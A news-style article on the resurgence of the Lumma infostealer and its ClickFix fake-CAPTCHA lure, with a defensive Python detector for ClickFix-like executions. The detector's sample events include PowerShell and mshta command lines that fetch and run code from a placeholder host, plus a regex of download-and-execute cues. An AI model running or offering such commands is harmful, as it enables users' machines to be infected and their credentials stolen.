The Lumma infostealer, a malware-as-a-service that once infected nearly 400,000 Windows computers, is once again actively circulating, despite a significant international law enforcement effort last year aimed at dismantling its infrastructure. Security researchers are warning that the malware is “back at scale,” demonstrating a remarkable resilience and adaptability in the face of disruption.
Lumma first emerged in Russian-speaking cybercrime forums in 2022, quickly gaining traction due to its affordability and effectiveness. The malware operated on a subscription basis, with premium versions selling for as much as $2,500. By early 2024, the FBI had identified over 21,000 listings related to Lumma on illicit online marketplaces, highlighting its widespread adoption within the cybercriminal community. Microsoft identified Lumma as a “go-to tool” for several prolific threat actors, including the Scattered Spider group.
In May 2025, a coordinated international effort led by the FBI resulted in the seizure of over 2,300 domains, command-and-control servers and crime marketplaces associated with Lumma. This operation was initially hailed as a major victory against the infostealer. However, the recent resurgence of Lumma demonstrates the challenges inherent in combating malware-as-a-service operations, where infrastructure can be rapidly rebuilt and redeployed.
Researchers at Bitdefender reported that Lumma has rapidly rebuilt its infrastructure and continues to spread globally. This resurgence isn’t simply a continuation of the old methods; the threat actors behind Lumma are employing more covert tactics to evade detection.
A particularly concerning tactic being used in the current wave of Lumma infections is dubbed “ClickFix.” This social engineering technique relies on deceiving users into executing malicious commands within the Windows terminal. Victims are presented with what appears to be a CAPTCHA challenge, but instead of requiring them to identify images or letters, they are instructed to copy and paste a block of text into the terminal window. This text, however, contains malicious commands that download and install loader malware, which then deploys Lumma onto the compromised system.
The effectiveness of ClickFix lies in its simplicity and the speed with which it can be executed. Users are often lulled into a false sense of security, believing they are simply completing a routine CAPTCHA verification. The process requires minimal technical knowledge, making it accessible to a wide range of potential victims.
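As an added illustration (not code from the article or from any vendor it cites), the Python below shows one way an endpoint team could flag ClickFix-style executions in process-creation telemetry. It assumes Sysmon-style field names and that a command pasted by the victim is launched from the desktop shell (explorer.exe as the parent process); the cue patterns and the sample events are constructed for the example.

```python
import re
from typing import Iterable

# Script hosts a pasted ClickFix one-liner would typically run in (assumption).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Cues that a command fetches and runs remote content (assumption; not a complete list).
DOWNLOAD_EXEC_CUE = re.compile(
    r"https?://|\biex\b|invoke-expression|downloadstring|\biwr\b|invoke-webrequest"
    r"|\bcurl\b|frombase64string|-enc[a-z]*\s|-w(indowstyle)?\s+hidden",
    re.IGNORECASE,
)

# Constructed sample process-creation records (Sysmon Event ID 1 style fields),
# not real telemetry from any Lumma campaign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/v.txt | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://example.invalid/captcha.hta"},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -Command Get-ChildItem"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

def basename(path: str) -> str:
    # Last path component, lower-cased, so image paths compare by file name only.
    return path.rsplit("\\", 1)[-1].lower()

def is_clickfix_like(event: dict) -> bool:
    # All three conditions together: interactive launch from the shell,
    # a script host, and a download-and-run cue in the command line.
    return (
        basename(event["ParentImage"]) == "explorer.exe"
        and basename(event["Image"]) in SCRIPT_HOSTS
        and DOWNLOAD_EXEC_CUE.search(event["CommandLine"]) is not None
    )

def detect(events: Iterable[dict]) -> list[dict]:
    return [e for e in events if is_clickfix_like(e)]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print("ClickFix-like execution:", hit["CommandLine"])
```

A real deployment would tune the cue list against the environment's own baseline, since administrators also launch PowerShell from the shell; the parent-process condition is what separates a pasted one-liner from a script run by a management tool.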
Lumma’s functionality centers around stealing sensitive information from compromised systems. This includes credentials (usernames and passwords), private files, and other data that can be used for identity theft, financial fraud, or further malicious activities. As a malware-as-a-service, Lumma lowers the barrier to entry for cybercriminals, allowing even those with limited technical skills to launch sophisticated attacks.
The re-emergence of Lumma highlights the limitations of relying solely on takedown operations to combat malware threats. While disrupting infrastructure can temporarily hinder an operation, it doesn’t necessarily eliminate the underlying threat. The actors behind Lumma have demonstrated an ability to adapt and rebuild, leveraging new techniques and infrastructure to continue their malicious activities.
Trend Micro researchers noted that Lumma is now distributed through more discreet channels, including abuse of platforms like GitHub and the use of fake CAPTCHA sites. This shift towards stealthier methods makes detection and prevention more challenging.
The ongoing evolution of Lumma underscores the importance of a multi-layered security approach. Organizations and individuals must prioritize cybersecurity awareness training, implement robust endpoint protection solutions, and stay informed about the latest threats and tactics used by cybercriminals. Specifically, users should be wary of any request to copy and paste commands into the Windows terminal, as this is a strong indicator of malicious activity.
The ability of Lumma to resurface so quickly after a major takedown serves as a stark reminder of the persistent and evolving nature of the cybersecurity landscape. Law enforcement efforts are crucial, but they must be coupled with proactive security measures and a commitment to continuous monitoring and adaptation to effectively mitigate the risks posed by sophisticated malware threats like Lumma.
